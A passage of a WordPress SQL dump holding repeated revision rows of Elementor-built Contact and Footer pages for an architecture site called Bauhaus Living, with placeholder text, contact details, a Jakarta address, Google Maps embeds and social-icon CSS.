src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/Logo-white.png\" \n					alt=\"Architecture &amp; Interior WordPress Theme\" \n					class=\"logo_mobile\" \n					style=\"width:157px ;  height:40px\" \n				/>\n				<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/Logo-white.png\" \n					alt=\"Architecture &amp; Interior WordPress Theme\" \n					class=\"logo_sticky\" \n					style=\"width:157px ; height:40px\" \n				/>\n							</a>\n							<h3>contact us </h3>\n														<h2>\n								Write anytime							</h2>\n		[contact-form-7 id=\"884\" title=\"Contact page\"]		\n			<style>/*! elementor - v3.6.6 - 08-06-2022 */\n.elementor-widget-google_maps .elementor-widget-container{overflow:hidden}.elementor-widget-google_maps iframe{height:300px}</style>		\n			<iframe frameborder=\"0\" scrolling=\"no\" marginheight=\"0\" marginwidth=\"0\"\n					src=\"https://maps.google.com/maps?q=London%20Eye%2C%20London%2C%20United%20Kingdom&#038;t=m&#038;z=14&#038;output=embed&#038;iwloc=near\"\n					title=\"London Eye, London, United Kingdom\"\n					aria-label=\"London Eye, London, United Kingdom\"\n			></iframe>','Contact','','inherit','closed','closed','','40-revision-v1','','','2022-11-14 04:47:34','2022-11-14 04:47:34','',40,'https://bauhaus.futuremediatrix.com/?p=4720',0,'revision','',0),(4721,1,'2022-11-14 04:47:34','2022-11-14 04:47:34','<h3>contact us</h3>\n														<h2>\n								Feel free to get in touch with retirio							</h2>\n							<p> Aliquam hendrerit a augue insuscipit. Etiam aliquam massa quis des mauris commodo venenatis ligula commodo leez sed blandit convallis dignissim onec vel pellentesque neque.\n </p>\n							Have any question?						\n					<ul>\n								<li>\n																					<a href=\"tel:+230009850 \">\n													Frre +23 (000)-9850												</a>\n																			</li>\n											</ul>\n							Write email						\n					<ul>\n								<li>\n																					<a href=\"mailto:needhelp@company.com \">\n													needhelp@company.com												</a>\n																			</li>\n											</ul>\n							Visit anytime 						\n					<ul>\n								<li>\n									<a href=\"https://goo.gl/maps/EzkDhhJPJ1XN4SKh6\">30 broklyn golden street. New York</a>								</li>\n											</ul>\n											<a href=\"https://demo.ovatheme.com/retirio/ \"   >\n				<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/Logo-white.png\" \n					alt=\"Architecture &amp; Interior WordPress Theme\" \n					class=\"logo_desktop\" \n					style=\"width:157px ; height:40px\" \n				/>\n				<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/Logo-white.png\" \n					alt=\"Architecture &amp; Interior WordPress Theme\" \n					class=\"logo_mobile\" \n					style=\"width:157px ;  height:40px\" \n				/>\n				<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/Logo-white.png\" \n					alt=\"Architecture &amp; Interior WordPress Theme\" \n					class=\"logo_sticky\" \n					style=\"width:157px ; height:40px\" \n				/>\n							</a>\n							<h3>contact us </h3>\n														<h2>\n								Write anytime							</h2>\n		[contact-form-7 id=\"884\" title=\"Contact page\"]		\n			<style>/*! elementor - v3.6.6 - 08-06-2022 */\n.elementor-widget-google_maps .elementor-widget-container{overflow:hidden}.elementor-widget-google_maps iframe{height:300px}</style>		\n			<iframe frameborder=\"0\" scrolling=\"no\" marginheight=\"0\" marginwidth=\"0\"\n					src=\"https://maps.google.com/maps?q=London%20Eye%2C%20London%2C%20United%20Kingdom&#038;t=m&#038;z=14&#038;output=embed&#038;iwloc=near\"\n					title=\"London Eye, London, United Kingdom\"\n					aria-label=\"London Eye, London, United Kingdom\"\n			></iframe>','Contact','','inherit','closed','closed','','40-revision-v1','','','2022-11-14 04:47:34','2022-11-14 04:47:34','',40,'https://bauhaus.futuremediatrix.com/?p=4721',0,'revision','',0),(4722,1,'2022-11-14 04:47:34','2022-11-14 04:47:34','<h3>contact us</h3>\n														<h2>\n								Feel free to get in touch with retirio							</h2>\n							<p> Aliquam hendrerit a augue insuscipit. Etiam aliquam massa quis des mauris commodo venenatis ligula commodo leez sed blandit convallis dignissim onec vel pellentesque neque.\n </p>\n							Have any question?						\n					<ul>\n								<li>\n																					<a href=\"tel:+230009850 \">\n													Frre +23 (000)-9850												</a>\n																			</li>\n											</ul>\n							Write email						\n					<ul>\n								<li>\n																					<a href=\"mailto:needhelp@company.com \">\n													needhelp@company.com												</a>\n																			</li>\n											</ul>\n							Visit anytime 						\n					<ul>\n								<li>\n									<a href=\"https://goo.gl/maps/aDtccje1G7M53R3E8\">BAUHAUS LIVING. Jl. Jalur 20 blok 22 no. 17, Meruya Utara Kembangan, Jakarta Barat 11620</a>								</li>\n											</ul>\n											<a href=\"https://bauhaus.futuremediatrix.com/ \"   >\n				<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/Logo-white.png\" \n					alt=\"Bauhaus Living\" \n					class=\"logo_desktop\" \n					style=\"width:157px ; height:40px\" \n				/>\n				<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/Logo-white.png\" \n					alt=\"Bauhaus Living\" \n					class=\"logo_mobile\" \n					style=\"width:157px ;  height:40px\" \n				/>\n				<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/Logo-white.png\" \n					alt=\"Bauhaus Living\" \n					class=\"logo_sticky\" \n					style=\"width:157px ; height:40px\" \n				/>\n							</a>\n							<h3>contact us </h3>\n														<h2>\n								Write anytime							</h2>\n		[contact-form-7 id=\"884\" title=\"Contact page\"]		\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-google_maps .elementor-widget-container{overflow:hidden}.elementor-widget-google_maps iframe{height:300px}</style>		\n			<iframe frameborder=\"0\" scrolling=\"no\" marginheight=\"0\" marginwidth=\"0\"\n					src=\"https://maps.google.com/maps?q=Jl.%20Jalur%2020%20blok%2022%20no.%2017%2C%20Meruya%20Utara%20Kembangan%2C%20Jakarta%20Barat%2011620&#038;t=m&#038;z=14&#038;output=embed&#038;iwloc=near\"\n					title=\"Jl. Jalur 20 blok 22 no. 17, Meruya Utara Kembangan, Jakarta Barat 11620\"\n					aria-label=\"Jl. Jalur 20 blok 22 no. 17, Meruya Utara Kembangan, Jakarta Barat 11620\"\n			></iframe>','Contact','','inherit','closed','closed','','40-revision-v1','','','2022-11-14 04:47:34','2022-11-14 04:47:34','',40,'https://bauhaus.futuremediatrix.com/?p=4722',0,'revision','',0),(4723,1,'2022-11-14 04:47:44','2022-11-14 04:47:44','<h3>contact us</h3>\n														<h2>\n								Feel free to get in touch with retirio							</h2>\n							<p> Aliquam hendrerit a augue insuscipit. Etiam aliquam massa quis des mauris commodo venenatis ligula commodo leez sed blandit convallis dignissim onec vel pellentesque neque.\n </p>\n							Have any question?						\n					<ul>\n								<li>\n																					<a href=\"tel:+230009850 \">\n													Frre +23 (000)-9850												</a>\n																			</li>\n											</ul>\n							Write email						\n					<ul>\n								<li>\n																					<a href=\"mailto:needhelp@company.com \">\n													needhelp@company.com												</a>\n																			</li>\n											</ul>\n							Visit anytime 						\n					<ul>\n								<li>\n									<a href=\"https://goo.gl/maps/aDtccje1G7M53R3E8\">BAUHAUS LIVING. Jl. Jalur 20 blok 22 no. 17, Meruya Utara Kembangan, Jakarta Barat 11620</a>								</li>\n											</ul>\n											<a href=\"https://bauhaus.futuremediatrix.com/ \"   >\n				<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/Logo-white.png\" \n					alt=\"Bauhaus Living\" \n					class=\"logo_desktop\" \n					style=\"width:157px ; height:40px\" \n				/>\n				<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/Logo-white.png\" \n					alt=\"Bauhaus Living\" \n					class=\"logo_mobile\" \n					style=\"width:157px ;  height:40px\" \n				/>\n				<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/Logo-white.png\" \n					alt=\"Bauhaus Living\" \n					class=\"logo_sticky\" \n					style=\"width:157px ; height:40px\" \n				/>\n							</a>\n							<h3>contact us </h3>\n														<h2>\n								Write anytime							</h2>\n		[contact-form-7 id=\"884\" title=\"Contact page\"]		\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-google_maps .elementor-widget-container{overflow:hidden}.elementor-widget-google_maps iframe{height:300px}</style>		\n			<iframe frameborder=\"0\" scrolling=\"no\" marginheight=\"0\" marginwidth=\"0\"\n					src=\"https://maps.google.com/maps?q=Jl.%20Jalur%2020%20blok%2022%20no.%2017%2C%20Meruya%20Utara%20Kembangan%2C%20Jakarta%20Barat%2011620&#038;t=m&#038;z=14&#038;output=embed&#038;iwloc=near\"\n					title=\"Jl. Jalur 20 blok 22 no. 17, Meruya Utara Kembangan, Jakarta Barat 11620\"\n					aria-label=\"Jl. Jalur 20 blok 22 no. 17, Meruya Utara Kembangan, Jakarta Barat 11620\"\n			></iframe>','Contact','','inherit','closed','closed','','40-revision-v1','','','2022-11-14 04:47:44','2022-11-14 04:47:44','',40,'https://bauhaus.futuremediatrix.com/?p=4723',0,'revision','',0),(4724,1,'2022-11-14 04:47:45','2022-11-14 04:47:45','<h3>contact us</h3>\n														<h2>\n								Feel free to get in touch with retirio							</h2>\n							<p> Aliquam hendrerit a augue insuscipit. Etiam aliquam massa quis des mauris commodo venenatis ligula commodo leez sed blandit convallis dignissim onec vel pellentesque neque.\n </p>\n							Have any question?						\n					<ul>\n								<li>\n																					<a href=\"tel:+230009850 \">\n													Frre +23 (000)-9850												</a>\n																			</li>\n											</ul>\n							Write email						\n					<ul>\n								<li>\n																					<a href=\"mailto:needhelp@company.com \">\n													needhelp@company.com												</a>\n																			</li>\n											</ul>\n							Visit anytime 						\n					<ul>\n								<li>\n									<a href=\"https://goo.gl/maps/aDtccje1G7M53R3E8\">BAUHAUS LIVING. Jl. Jalur 20 blok 22 no. 17, Meruya Utara Kembangan, Jakarta Barat 11620</a>								</li>\n											</ul>\n											<a href=\"https://bauhaus.futuremediatrix.com/ \"   >\n				<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/Logo-white.png\" \n					alt=\"Bauhaus Living\" \n					class=\"logo_desktop\" \n					style=\"width:157px ; height:40px\" \n				/>\n				<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/Logo-white.png\" \n					alt=\"Bauhaus Living\" \n					class=\"logo_mobile\" \n					style=\"width:157px ;  height:40px\" \n				/>\n				<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/Logo-white.png\" \n					alt=\"Bauhaus Living\" \n					class=\"logo_sticky\" \n					style=\"width:157px ; height:40px\" \n				/>\n							</a>\n							<h3>contact us </h3>\n														<h2>\n								Write anytime							</h2>\n		[contact-form-7 id=\"884\" title=\"Contact page\"]		\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-google_maps .elementor-widget-container{overflow:hidden}.elementor-widget-google_maps iframe{height:300px}</style>		\n			<iframe frameborder=\"0\" scrolling=\"no\" marginheight=\"0\" marginwidth=\"0\"\n					src=\"https://maps.google.com/maps?q=Jl.%20Jalur%2020%20blok%2022%20no.%2017%2C%20Meruya%20Utara%20Kembangan%2C%20Jakarta%20Barat%2011620&#038;t=m&#038;z=14&#038;output=embed&#038;iwloc=near\"\n					title=\"Jl. Jalur 20 blok 22 no. 17, Meruya Utara Kembangan, Jakarta Barat 11620\"\n					aria-label=\"Jl. Jalur 20 blok 22 no. 17, Meruya Utara Kembangan, Jakarta Barat 11620\"\n			></iframe>','Contact','','inherit','closed','closed','','40-revision-v1','','','2022-11-14 04:47:45','2022-11-14 04:47:45','',40,'https://bauhaus.futuremediatrix.com/?p=4724',0,'revision','',0),(4725,1,'2022-11-14 04:47:45','2022-11-14 04:47:45','<h3>contact us</h3>\n														<h2>\n								Feel free to get in touch with retirio							</h2>\n							<p> Aliquam hendrerit a augue insuscipit. Etiam aliquam massa quis des mauris commodo venenatis ligula commodo leez sed blandit convallis dignissim onec vel pellentesque neque.\n </p>\n							Have any question?						\n					<ul>\n								<li>\n																					<a href=\"tel:+230009850 \">\n													Frre +23 (000)-9850												</a>\n																			</li>\n											</ul>\n							Write email						\n					<ul>\n								<li>\n																					<a href=\"mailto:needhelp@company.com \">\n													needhelp@company.com												</a>\n																			</li>\n											</ul>\n							Visit anytime 						\n					<ul>\n								<li>\n									<a href=\"https://goo.gl/maps/aDtccje1G7M53R3E8\">BAUHAUS LIVING. Jl. Jalur 20 blok 22 no. 17, Meruya Utara Kembangan, Jakarta Barat 11620</a>								</li>\n											</ul>\n											<a href=\"https://bauhaus.futuremediatrix.com/ \"   >\n				<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/Logo-white.png\" \n					alt=\"Bauhaus Living\" \n					class=\"logo_desktop\" \n					style=\"width:157px ; height:40px\" \n				/>\n				<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/Logo-white.png\" \n					alt=\"Bauhaus Living\" \n					class=\"logo_mobile\" \n					style=\"width:157px ;  height:40px\" \n				/>\n				<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/Logo-white.png\" \n					alt=\"Bauhaus Living\" \n					class=\"logo_sticky\" \n					style=\"width:157px ; height:40px\" \n				/>\n							</a>\n							<h3>contact us </h3>\n														<h2>\n								Write anytime							</h2>\n		[contact-form-7 id=\"884\" title=\"Contact page\"]		\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-google_maps .elementor-widget-container{overflow:hidden}.elementor-widget-google_maps iframe{height:300px}</style>		\n			<iframe frameborder=\"0\" scrolling=\"no\" marginheight=\"0\" marginwidth=\"0\"\n					src=\"https://maps.google.com/maps?q=Jl.%20Jalur%2020%20blok%2022%20no.%2017%2C%20Meruya%20Utara%20Kembangan%2C%20Jakarta%20Barat%2011620&#038;t=m&#038;z=14&#038;output=embed&#038;iwloc=near\"\n					title=\"Jl. Jalur 20 blok 22 no. 17, Meruya Utara Kembangan, Jakarta Barat 11620\"\n					aria-label=\"Jl. Jalur 20 blok 22 no. 17, Meruya Utara Kembangan, Jakarta Barat 11620\"\n			></iframe>','Contact','','inherit','closed','closed','','40-revision-v1','','','2022-11-14 04:47:45','2022-11-14 04:47:45','',40,'https://bauhaus.futuremediatrix.com/?p=4725',0,'revision','',0),(4726,1,'2022-11-14 04:48:26','2022-11-14 04:48:26','<h3>contact us</h3>\n														<h2>\n								Feel free to get in touch with retirio							</h2>\n							<p> Aliquam hendrerit a augue insuscipit. Etiam aliquam massa quis des mauris commodo venenatis ligula commodo leez sed blandit convallis dignissim onec vel pellentesque neque.\n </p>\n							Have any question?						\n					<ul>\n								<li>\n																					<a href=\"tel:+230009850 \">\n													Frre +23 (000)-9850												</a>\n																			</li>\n											</ul>\n							Write email						\n					<ul>\n								<li>\n																					<a href=\"mailto:needhelp@company.com \">\n													needhelp@company.com												</a>\n																			</li>\n											</ul>\n							Visit anytime 						\n					<ul>\n								<li>\n									<a href=\"https://goo.gl/maps/aDtccje1G7M53R3E8\">BAUHAUS LIVING. Jl. Jalur 20 blok 22 no. 17, Meruya Utara Kembangan, Jakarta Barat 11620</a>								</li>\n											</ul>\n											<a href=\"https://bauhaus.futuremediatrix.com/ \"   >\n				<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/Logo-white.png\" \n					alt=\"Bauhaus Living\" \n					class=\"logo_desktop\" \n					style=\"width:157px ; height:40px\" \n				/>\n				<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/Logo-white.png\" \n					alt=\"Bauhaus Living\" \n					class=\"logo_mobile\" \n					style=\"width:157px ;  height:40px\" \n				/>\n				<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/Logo-white.png\" \n					alt=\"Bauhaus Living\" \n					class=\"logo_sticky\" \n					style=\"width:157px ; height:40px\" \n				/>\n							</a>\n							<h3>contact us </h3>\n														<h2>\n								Write anytime							</h2>\n		[contact-form-7 id=\"884\" title=\"Contact page\"]		\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-google_maps .elementor-widget-container{overflow:hidden}.elementor-widget-google_maps iframe{height:300px}</style>		\n			<iframe frameborder=\"0\" scrolling=\"no\" marginheight=\"0\" marginwidth=\"0\"\n					src=\"https://maps.google.com/maps?q=Jl.%20Jalur%2020%20blok%2022%20no.%2017%2C%20Meruya%20Utara%20Kembangan%2C%20Jakarta%20Barat%2011620&#038;t=m&#038;z=14&#038;output=embed&#038;iwloc=near\"\n					title=\"Jl. Jalur 20 blok 22 no. 17, Meruya Utara Kembangan, Jakarta Barat 11620\"\n					aria-label=\"Jl. Jalur 20 blok 22 no. 17, Meruya Utara Kembangan, Jakarta Barat 11620\"\n			></iframe>','Contact','','inherit','closed','closed','','40-revision-v1','','','2022-11-14 04:48:26','2022-11-14 04:48:26','',40,'https://bauhaus.futuremediatrix.com/?p=4726',0,'revision','',0),(4727,1,'2022-11-14 04:48:26','2022-11-14 04:48:26','<h3>contact us</h3>\n														<h2>\n								Feel free to get in touch with retirio							</h2>\n							<p> Aliquam hendrerit a augue insuscipit. Etiam aliquam massa quis des mauris commodo venenatis ligula commodo leez sed blandit convallis dignissim onec vel pellentesque neque.\n </p>\n							Have any question?						\n					<ul>\n								<li>\n																					<a href=\"tel:+230009850 \">\n													Frre +23 (000)-9850												</a>\n																			</li>\n											</ul>\n							Write email						\n					<ul>\n								<li>\n																					<a href=\"mailto:needhelp@company.com \">\n													needhelp@company.com												</a>\n																			</li>\n											</ul>\n							Visit anytime 						\n					<ul>\n								<li>\n									<a href=\"https://goo.gl/maps/aDtccje1G7M53R3E8\">BAUHAUS LIVING. Jl. Jalur 20 blok 22 no. 17, Meruya Utara Kembangan, Jakarta Barat 11620</a>								</li>\n											</ul>\n											<a href=\"https://bauhaus.futuremediatrix.com/ \"   >\n				<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/Logo-white.png\" \n					alt=\"Bauhaus Living\" \n					class=\"logo_desktop\" \n					style=\"width:157px ; height:40px\" \n				/>\n				<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/Logo-white.png\" \n					alt=\"Bauhaus Living\" \n					class=\"logo_mobile\" \n					style=\"width:157px ;  height:40px\" \n				/>\n				<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/Logo-white.png\" \n					alt=\"Bauhaus Living\" \n					class=\"logo_sticky\" \n					style=\"width:157px ; height:40px\" \n				/>\n							</a>\n							<h3>contact us </h3>\n														<h2>\n								Write anytime							</h2>\n		[contact-form-7 id=\"884\" title=\"Contact page\"]		\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-google_maps .elementor-widget-container{overflow:hidden}.elementor-widget-google_maps iframe{height:300px}</style>		\n			<iframe frameborder=\"0\" scrolling=\"no\" marginheight=\"0\" marginwidth=\"0\"\n					src=\"https://maps.google.com/maps?q=Jl.%20Jalur%2020%20blok%2022%20no.%2017%2C%20Meruya%20Utara%20Kembangan%2C%20Jakarta%20Barat%2011620&#038;t=m&#038;z=14&#038;output=embed&#038;iwloc=near\"\n					title=\"Jl. Jalur 20 blok 22 no. 17, Meruya Utara Kembangan, Jakarta Barat 11620\"\n					aria-label=\"Jl. Jalur 20 blok 22 no. 17, Meruya Utara Kembangan, Jakarta Barat 11620\"\n			></iframe>','Contact','','inherit','closed','closed','','40-revision-v1','','','2022-11-14 04:48:26','2022-11-14 04:48:26','',40,'https://bauhaus.futuremediatrix.com/?p=4727',0,'revision','',0),(4728,1,'2022-11-14 04:48:26','2022-11-14 04:48:26','<h3>contact us</h3>\n														<h2>\n								Feel free to get in touch with retirio							</h2>\n							<p> Aliquam hendrerit a augue insuscipit. Etiam aliquam massa quis des mauris commodo venenatis ligula commodo leez sed blandit convallis dignissim onec vel pellentesque neque.\n </p>\n							Have any question?						\n					<ul>\n								<li>\n																					<a href=\"tel:+021 22544768 \">\n													021 22544768												</a>\n																			</li>\n											</ul>\n							Write email						\n					<ul>\n								<li>\n																					<a href=\"mailto:info@bauhausliving.com \">\n													info@bauhausliving.com												</a>\n																			</li>\n											</ul>\n							Visit anytime 						\n					<ul>\n								<li>\n									<a href=\"https://goo.gl/maps/aDtccje1G7M53R3E8\">BAUHAUS LIVING. Jl. Jalur 20 blok 22 no. 17, Meruya Utara Kembangan, Jakarta Barat 11620</a>								</li>\n											</ul>\n											<a href=\"https://bauhaus.futuremediatrix.com/ \"   >\n				<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/Logo-white.png\" \n					alt=\"Bauhaus Living\" \n					class=\"logo_desktop\" \n					style=\"width:157px ; height:40px\" \n				/>\n				<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/Logo-white.png\" \n					alt=\"Bauhaus Living\" \n					class=\"logo_mobile\" \n					style=\"width:157px ;  height:40px\" \n				/>\n				<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/Logo-white.png\" \n					alt=\"Bauhaus Living\" \n					class=\"logo_sticky\" \n					style=\"width:157px ; height:40px\" \n				/>\n							</a>\n							<h3>contact us </h3>\n														<h2>\n								Write anytime							</h2>\n		[contact-form-7 id=\"884\" title=\"Contact page\"]		\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-google_maps .elementor-widget-container{overflow:hidden}.elementor-widget-google_maps iframe{height:300px}</style>		\n			<iframe frameborder=\"0\" scrolling=\"no\" marginheight=\"0\" marginwidth=\"0\"\n					src=\"https://maps.google.com/maps?q=Jl.%20Jalur%2020%20blok%2022%20no.%2017%2C%20Meruya%20Utara%20Kembangan%2C%20Jakarta%20Barat%2011620&#038;t=m&#038;z=14&#038;output=embed&#038;iwloc=near\"\n					title=\"Jl. Jalur 20 blok 22 no. 17, Meruya Utara Kembangan, Jakarta Barat 11620\"\n					aria-label=\"Jl. Jalur 20 blok 22 no. 17, Meruya Utara Kembangan, Jakarta Barat 11620\"\n			></iframe>','Contact','','inherit','closed','closed','','40-revision-v1','','','2022-11-14 04:48:26','2022-11-14 04:48:26','',40,'https://bauhaus.futuremediatrix.com/?p=4728',0,'revision','',0),(4729,1,'2022-11-14 05:00:51','2022-11-14 05:00:51','<style>/*! elementor - v3.6.6 - 08-06-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>We build amazing architectural designs</h2>		\n		[mc4wp_form id=\"107\"]		\n					<ul>\n								<li>\n																					<a href=\"tel:+23425446680 \">\n													+23 425 4466 80												</a>\n																			</li>\n											</ul>\n					<ul>\n								<li>\n																					<a href=\"mailto:needhelp@company.com \">\n													needhelp@company.com												</a>\n																			</li>\n											</ul>\n			<style>/*! elementor - v3.6.6 - 08-06-2022 */\n.elementor-widget-social-icons.elementor-grid-0 .elementor-widget-container,.elementor-widget-social-icons.elementor-grid-mobile-0 .elementor-widget-container,.elementor-widget-social-icons.elementor-grid-tablet-0 .elementor-widget-container{line-height:1;font-size:0}.elementor-widget-social-icons:not(.elementor-grid-0):not(.elementor-grid-tablet-0):not(.elementor-grid-mobile-0) .elementor-grid{display:inline-grid}.elementor-widget-social-icons .elementor-grid{grid-column-gap:var(--grid-column-gap,5px);grid-row-gap:var(--grid-row-gap,5px);grid-template-columns:var(--grid-template-columns);-webkit-box-pack:var(--justify-content,center);-ms-flex-pack:var(--justify-content,center);justify-content:var(--justify-content,center);justify-items:var(--justify-content,center)}.elementor-icon.elementor-social-icon{font-size:var(--icon-size,25px);line-height:var(--icon-size,25px);width:calc(var(--icon-size, 25px) + (2 * var(--icon-padding, .5em)));height:calc(var(--icon-size, 25px) + (2 * var(--icon-padding, .5em)))}.elementor-social-icon{--e-social-icon-icon-color:#fff;display:-webkit-inline-box;display:-ms-inline-flexbox;display:inline-flex;background-color:#818a91;-webkit-box-align:center;-ms-flex-align:center;align-items:center;-webkit-box-pack:center;-ms-flex-pack:center;justify-content:center;text-align:center;cursor:pointer}.elementor-social-icon i{color:var(--e-social-icon-icon-color)}.elementor-social-icon svg{fill:var(--e-social-icon-icon-color)}.elementor-social-icon:last-child{margin:0}.elementor-social-icon:hover{opacity:.9;color:#fff}.elementor-social-icon-android{background-color:#a4c639}.elementor-social-icon-apple{background-color:#999}.elementor-social-icon-behance{background-color:#1769ff}.elementor-social-icon-bitbucket{background-color:#205081}.elementor-social-icon-codepen{background-color:#000}.elementor-social-icon-delicious{background-color:#39f}.elementor-social-icon-deviantart{background-color:#05cc47}.elementor-social-icon-digg{background-color:#005be2}.elementor-social-icon-dribbble{background-color:#ea4c89}.elementor-social-icon-elementor{background-color:#d30c5c}.elementor-social-icon-envelope{background-color:#ea4335}.elementor-social-icon-facebook,.elementor-social-icon-facebook-f{background-color:#3b5998}.elementor-social-icon-flickr{background-color:#0063dc}.elementor-social-icon-foursquare{background-color:#2d5be3}.elementor-social-icon-free-code-camp,.elementor-social-icon-freecodecamp{background-color:#006400}.elementor-social-icon-github{background-color:#333}.elementor-social-icon-gitlab{background-color:#e24329}.elementor-social-icon-globe{background-color:#818a91}.elementor-social-icon-google-plus,.elementor-social-icon-google-plus-g{background-color:#dd4b39}.elementor-social-icon-houzz{background-color:#7ac142}.elementor-social-icon-instagram{background-color:#262626}.elementor-social-icon-jsfiddle{background-color:#487aa2}.elementor-social-icon-link{background-color:#818a91}.elementor-social-icon-linkedin,.elementor-social-icon-linkedin-in{background-color:#0077b5}.elementor-social-icon-medium{background-color:#00ab6b}.elementor-social-icon-meetup{background-color:#ec1c40}.elementor-social-icon-mixcloud{background-color:#273a4b}.elementor-social-icon-odnoklassniki{background-color:#f4731c}.elementor-social-icon-pinterest{background-color:#bd081c}.elementor-social-icon-product-hunt{background-color:#da552f}.elementor-social-icon-reddit{background-color:#ff4500}.elementor-social-icon-rss{background-color:#f26522}.elementor-social-icon-shopping-cart{background-color:#4caf50}.elementor-social-icon-skype{background-color:#00aff0}.elementor-social-icon-slideshare{background-color:#0077b5}.elementor-social-icon-snapchat{background-color:#fffc00}.elementor-social-icon-soundcloud{background-color:#f80}.elementor-social-icon-spotify{background-color:#2ebd59}.elementor-social-icon-stack-overflow{background-color:#fe7a15}.elementor-social-icon-steam{background-color:#00adee}.elementor-social-icon-stumbleupon{background-color:#eb4924}.elementor-social-icon-telegram{background-color:#2ca5e0}.elementor-social-icon-thumb-tack{background-color:#1aa1d8}.elementor-social-icon-tripadvisor{background-color:#589442}.elementor-social-icon-tumblr{background-color:#35465c}.elementor-social-icon-twitch{background-color:#6441a5}.elementor-social-icon-twitter{background-color:#1da1f2}.elementor-social-icon-viber{background-color:#665cac}.elementor-social-icon-vimeo{background-color:#1ab7ea}.elementor-social-icon-vk{background-color:#45668e}.elementor-social-icon-weibo{background-color:#dd2430}.elementor-social-icon-weixin{background-color:#31a918}.elementor-social-icon-whatsapp{background-color:#25d366}.elementor-social-icon-wordpress{background-color:#21759b}.elementor-social-icon-xing{background-color:#026466}.elementor-social-icon-yelp{background-color:#af0606}.elementor-social-icon-youtube{background-color:#cd201f}.elementor-social-icon-500px{background-color:#0099e5}.elementor-shape-rounded .elementor-icon.elementor-social-icon{border-radius:10%}.elementor-shape-circle .elementor-icon.elementor-social-icon{border-radius:50%}</style>		\n					<a href=\"https://twitter.com/ovathemes\" target=\"_blank\" rel=\"noopener\">\n						Twitter\n											</a>\n					<a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n						Facebook\n											</a>\n					<a href=\"https://ovatheme.com/\" target=\"_blank\" rel=\"noopener\">\n						Pinterest-p\n											</a>\n					<a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n						Instagram\n											</a>\n			<h2>Explore</h2>		\n			<ul id=\"menu-menu-explore\"><li id=\"menu-item-44\"><a href=\"https://demo.ovatheme.com/retirio/about/\">About</a></li>\n<li id=\"menu-item-45\"><a href=\"https://demo.ovatheme.com/retirio/contact/\">Contact</a></li>\n<li id=\"menu-item-46\"><a href=\"https://demo.ovatheme.com/retirio/services/\">Services</a></li>\n<li id=\"menu-item-47\"><a href=\"#\">Recent Projects</a></li>\n<li id=\"menu-item-48\"><a href=\"#\">Press Media</a></li>\n</ul>		\n			<h2>Contact</h2>		\n					<ul>\n								<li>\n									<a href=\"https://www.google.com/maps\" target=\"_blank\" rel=\"noopener\">30 Broklyn Golden Street, New York United States of America</a>								</li>\n											</ul>\n		© All Copyright 2022 by Ovatheme.com','Footer','','inherit','closed','closed','','103-revision-v1','','','2022-11-14 05:00:51','2022-11-14 05:00:51','',103,'https://bauhaus.futuremediatrix.com/?p=4729',0,'revision','',0),(4730,1,'2022-11-14 05:00:51','2022-11-14 05:00:51','<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>We build amazing architectural designs</h2>		\n		[mc4wp_form id=\"107\"]		\n					<ul>\n								<li>\n																					<a href=\"tel:021 